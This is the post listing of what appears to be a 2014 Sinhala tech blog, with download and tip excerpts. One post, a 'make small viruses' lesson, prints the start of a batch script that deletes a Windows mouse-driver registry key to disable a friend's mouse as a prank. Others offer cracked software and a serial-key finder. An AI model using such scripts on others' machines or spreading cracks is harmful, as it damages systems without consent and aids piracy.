Blogger Tips and TricksLatest Tips And TricksBlogger Tricks
Blogger Tips and TricksLatest Tips And TricksBlogger Tricks

Thursday, July 31, 2014

Mouse ඕනිම නෑ Keyboard එක Mouse එක විදියට Use කරමු...

අපේ යාලුවන්ට තවත් වටින Post එකක් තමයි දෙන්න යන්නේ.. හදිස්සියේ ඔයාගේ Mouse එක වැඩ නොකර ගියොත් මොකද කරන්නේ.. අව්ලක් ඇත්තෙම නෑ.. Keyboard එක Mouse එක විදියට Use කරනවා.. ඉතින් ඔන්න ඔය වැඩේ කරගන්නේ කොහොමද කියල තමයි අද කියන්න යන්නේ... එහෙනම් අපි බලමු මේක කරන්නේ කොහොමද කියලා.. මේක Windows XP වලට එක විදියකටත් Windows 7 , 8 වලට තවත් විදියකටත් තමයි කරගන්න වෙන්නේ.. ඉතින් මම මේ ක්‍රම දෙකම පැහැදිලිව Photo එක්කම කියල දෙන්නම්..  Windows...

IGI 2 Covert Strike Game එක ඔන්න Direct බාගන්න...

මතක ඇතිනේ අපි කලින් Post එකකින් කියල දුන්න කොහොමද IGI 2 Game එකේ Mission ටික එකපාර Unlock කරගන්නේ කියලා.. ඒක බැලුවෙ නැත්නම් මෙතනින් බලන්න. ඒත් එක්කම අපේ යාලුවො ඉල්ලලා තිබුනා IGI 2 Game එක Dirrect Download කරගන්න දෙන්න කියලා.. ඉතින් ඔන්න ඒ නිසා අපි අද දෙනවා IGI 2 Game එක MediaFire එකෙන් Direct බාගන්න.. ඔන්න එහෙනම් පහළ Link  එකෙන් බාගන්නම්.. 176 MB තමයි තියෙන්නේ. එහෙනම් අපි ගියා.. අව්ලක් තිබුනොත් Comment කරන්...

Wednesday, July 30, 2014

පුංචි පුංචි Virus හදමු පළමු කුප්පිය - Mouse එක Disable කරන Vrus එකක් හදමු..

ඔන්න අද අපේ පුංචි පුංචි Virus හදමු පළමු කුප්පිය දෙන්න හිතුවා.. මේක ගොඩක් සරල මට්ටමේ Vrus එකක්.. මේකෙන් වෙන්නේ Mouse එක වැඩ නොකර යන එක.. යාලුවන්ට එහෙම පොඩි ආතල් එකක් දෙන්නත් එක්ක හදල බලන්න.. අපි මේක හදන්නේ Notepad එක Use කරලා.. මුළින්ම ඔය පහළ තියෙන Code එක Notepad එකේ ඔය තියෙන විදියටම Type කරගන්න.. rem ----------- rem Disable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key%...

Tuesday, July 29, 2014

IGI 2 එකේ ඔක්කොම Mission එක පාර Unlock කරගමු...

IGI 2 කියන්නේ අපේ රටේ වගේම ලෝකෙ ගොඩක් ජනප්‍රිය වෙච්ච සුප්පා ගේමක්නේ.. IGI නොගහපු කෙනෙක් හොයන එකනම් ටිකක් අමරු වැඩක්.. මතක ඇති නේ වරු ගනන් කට්ට කාල එක මිෂන් එකක් ඉවර කරන විදිය.. ඔය කාට කාටත් අයෙත් දාල බැලුවොත් එක පාරින් ගේම ඉවර කරන එකනම් ටිකක් අමරුයි.. ඒ තරම් මේ ගේම පට්ට. කියන්න ආපු දේ අමතක උනා නේ.. අද කියන්න හදන්නේ IGI 2 එකේ සේරම Mssion ටික Unlock කරගන්න විදියයි.. එතකොට ඉතින් තමන්ට කැමති මිෂන් එක ගහන්න පුලුවන් නේ.. මුලින්ම ඔය පහළ...

Sunday, July 27, 2014

ඔයාගෙ Java Phone එකටත් ඔන්න සුපිරි සිංහල Dictionary එකක්...

මේ දවස්වල ඉතින් ජනප්‍රිය වෙලා තියෙන්නෙ Android Phone නේ.. ඒත් ඉතින් අපේ රටේ තවමත් Android Phone නැති අය ඕනි තරම් ඉන්නවා.. ඉතින් මෙන්න මේ Andrid තාක්ෂණයට කලින් Phone වල ගොඩක් භාවිතා උනේ Java යන ක්‍රමය.. ඒ Phone වල Game , Software ආදිය Run වෙන්නේ Java හරහා තමයි.. ඔය Nokia, Sony Ericsson, Samsung වගේ පරන Phone වල තියෙන්නේ මෙන්න මේ කියන Java තාක්ෂණය.. ඉතින් අන්න ඒ Phone වල වැඩ කරන සුපිරිම සිංහල ඩික්ෂනරි එකක් තමයි අද දෙන්නේ.. ඔන්න පහළ Link එකෙන්...

මෙන්න ඔයා හිතන අංකය හරියටම කියන නියම Apps එකක් ( Mind Maths )

මුලින්ම කියන්න ඕනි මේක ලංකාවෙ කොල්ලෙක්ගෙ වැඩක්.. පසන් කියල කෙනෙක් තමයි මේක නිර්මාණය කලේ.. මේ Apps එකෙන් ඔයා හිතුව අංකය මොකක්ද කියල හරියටම කියනවා.. Fun එකටත් එක්ක Try කරල බලන්න.. Install කිරිලි මොකුත් ඕනි නෑ.. Double Click කරල Open කරන්න විතරයි තියෙන්නේ..  ඔන්න පහළ Link එකෙන් බාගන්න..( 33 KB ) එහෙනම් අපි ගියා.. Comment එකක් එහෙමත් දාල යන...

Saturday, July 26, 2014

Adobe CS2 ඔන්න Official Side එකෙන්ම නොමිලේ බාගන්න..

Adobe CS2 කිව්වම දන්නවනේ.. මේක Adobe  වල ටිකක් පැරණි සංස්කරණයක්.. දැන් නම් USE කරන්නේ Adobe CS5 වගේනේ.. එකත් ඉතින් Trial Virsion එකක් Crack කරගෙනනේ.. ඒත් දැන් Adobe CS2 එකේ Original එකනම් නොමිලේම දෙනවා.. ඉතින් නරකද මේ Orginal එක බාගත්තනම්.. Adobe Site එකේ Register වෙලාම බාගන්න පුලුවන්.... මේකෙන් අපේ යාලුවන්ගේ XP තියෙන Ram එක එහෙම අඩු Computer එකෙන් හොදට වැඩ ගන්න පුලුවන්.. PhotoShop, After Effect, ilustrater, ඔයවගේ...

Friday, July 25, 2014

Pen වලින් එන Virus වලින් බේරෙන්න ඔන්න USB Disk Securuity Full එක හැමදාටම...

උඩ තියෙන Topic එක බැලුවම තේරෙනවානේ අද දෙන්න යන්නේ මොකක්ද කියලා.. USB Disk Security කියන්නේ USB Drive වලින් එන Virus හා පරිගණකයට අහිතකර Programme වලින් ඔයාලගෙ පරිගණකය ආරක්ෂා කර දෙන පුංචි මෘදුකාංගයක්.. මේ ගැන නොදන්න කෙනෙක් නැහැනේ ඉතින්.. අදත් අපි මේකෙ Crack එකත් එක්ක තමයි දෙන්නේ.. එතකොට කරදරයක් නැතුව හැමදාම Use කරන්න පුලුවන්නේ.. ඔන්න එහෙනම් පහළ Link එකෙන් බාගන්න.. ( 1 MB ) එහෙනම් අපි ගියා.. තවත් අලුත් Post එකකින් හමුවෙමු... ...

Thursday, July 24, 2014

Data Recovery කරගන්න තවත් සුප්පා භාණ්ඩයක්.. ( EaseUS Data Recovery Pro )

මතක ඇතිනේ අපේ යාලුවන්ට Pen Drive එකෙන් ,Chip එකෙන් , ඔයාගෙ Hard Disk එකෙන් Delete කරපුව ආයෙත් ගන්න අපි Recuva කියල මෘදුකාංගයක් දුන්න.. ඔන්න ඒක බැලුවෙ නැත්නම් මෙතනින් බලන්න.. ඉතින් ඔන්න අදත් ඒ වගේ වටින තවත් නියම Recovery Software එකක් තමයි දෙන්නේ.. නිකන් නෙමෙයි Professional එක.. මේකෙ නම තමයි EaseUS Data Recovery කියන්නේ. අරන් බලන්නකෝ කොහොමද මෙයාගෙ වැඩ කියලා.. ඔන්න එහෙනම් පහළින් බාගන්න.. ( 5 MB ) එහෙනම් අපි ගියා.. තවත් Post...

Wednesday, July 23, 2014

ඔන්න සුපිරිම සිංහල - ඉංග්‍රීසි ඩික්ෂනරි එකක් අපෙන්... ( නාමල් ඩික්ෂනරි )

අපේ යාලුවො තවමත් Use කරන්නේ මධුර , Lion වගේ ඩික්ෂනරි නේ.. ඉතින් ඔන්න ඊට එහා ගියපු සුපිරි වැඩ කෑලි තියෙන් ඩික්ෂනරි එකක් 2014 වෙනුවෙන් නිකුත් උනා.. මේකේ නම තමයි නාමල් ඩික්ෂනරි කියන්නේ.. ඉංග්‍රීසි වචන වල තෙරුම බලාගන්න විතරක් නෙමෙයි ඔයාට English Grammer එහෙම ඉගන ගන්න ඔය පහළ රූපෙ තියෙන විදියට Tricks එහෙම දීල Full සප් එකක් දෙනවා.. ඒ විතරක් නෙමෙයි මේකට සම්පූරණ වාක්‍යම එක පාර Search කරල වාක්‍ය පිලිබදව පැහැදිලි අදහසක් ගන්න පුලුවන්.. මේකේ තියෙන තවත්...

මොකටද Skype Install කරගන්න Data කපාගන්නේ ඔන්න අරන් තියාගන්න Skype Offline Installer එක අපෙන්...

අද අපේ යාලුවන්ට තවත් වටින කියන Software එකක් තමයි දෙන්නේ.. Skype කිව්වම දන්නවනේ.. කව්ද ඉතින් දැන් Skype නැත්තේ නේද ? ඒ කොහොම උනත් සාමාන්‍යයෙන් අපිට Skype මෘදුකාංගය දෙන්නේ Internet එකට Connect වෙලා Install කරගන්න නේ.. ඉතින් ඔයා Skype Install කරන හැම වෙලේම නිකන් Data කපාගන්න වෙනවා.. ඉතින් ඒක නිසා අපි දෙන්න හිතුව Net Connect නොවී Install කරගන්න පුලුවන් Skype Setup එකක්.. ඔන්න ඉතින් එක පාරක් අරගෙන තියාගත්තම වැඩේ ගොඩ.. හැමදාම Data කපාගන්නේ මොකටද...

Tuesday, July 22, 2014

ඔන්න සුපිරිම වැඩ එක්ක පුංචිම Audio Player කෑල්ලක්.. ( XM Player 360 KB )

ඔන්න එහෙනම් සුපිරිම වැඩ එක්ක පුංචිම Audio Player කෑල්ලක් තමයි අද අරන් ආවේ.. අඩුම තරමෙ මේක Install කරන්නවත් දෙයක් නෑ.. බාගෙන Extract කරල Run කරානම් එච්චරයි.. ඒ උනාට වැඩනම් පුංචි නෑ. වැඩිය විස්තර ඕනි නැහැ නේ.. පහළ Link එකෙන් බාගන්න එහෙනම්.. ( 360 KB ) එහෙනම් අපි ගියා.. තවත් අලුත් Post එකකින් හමුවෙමු.. ...

කට්ට නොකා Serial Key හොයා ගන්න පට්ට භාණ්ඩයක්...

අදත් තවත් වටින Software එකක් තමයි දෙන්න යන්නේ.. අපේ යාලුවො ගොඩක්ම Use කරන්නේ Trial Software නේ..  නැතුව ඉතින් අපිට කොයින්ද සල්ලි දීල ගන්න සල්ලි.. ඉතින් Trial එක ඉවර උනාම කොහෙන්හරි Serial Key එකක් හොයා ගන්න වෙනවා.. ඔන්න ඒකට සුපිරිම භාණ්ඩයක් ගෙනාවා.. මේකේ ඔය එක එක Software වල Serial දහස් ගානක් තියනවා.. ඉතින් තවත් මොකටද බලන් ඉන්නේ.. ඔන්න එහෙනම් පහළින් බාගන්න.. ( 200 KB ) එහෙනම් අපි ගියා.. අලුත් Post එකක් එක්ක හමුවෙමු.. ...

Sunday, July 20, 2014

ඔන්න Kaspersky 2015 ත් ආවා.. එහෙනම් බාගන්නකෝ උණු උණුවෙම..

දන්නවනේ Kaspersky කිවුවම හැමෝම ලොකෙ තියෙන සුපිරිම Anti Virus Software එකක් කියලා.. ඉතින් ඔන්න ඒකේ 2015 වෙනුවෙන් අලුත්ම Virsion එක ඊයෙ නිකුත් උනා.. කලින් තිබුන 2014 එකේ සියලුම වැඩත් එක්ක තව අලුත් අලුත් වැඩ කෑලි එහෙමත් එකතු වෙලා තියෙනවා.. වැඩි විස්තර ඕනි නෑ..  ඔන්න පහළ පහළ Link එකෙන් ගිහින් Official Site එකෙන්ම බාගන්න.. Download Kaspersky Anti Virus 2015 Download Kaspersky Internet Security 2015 මේක දවස් 30 Trial එකක්...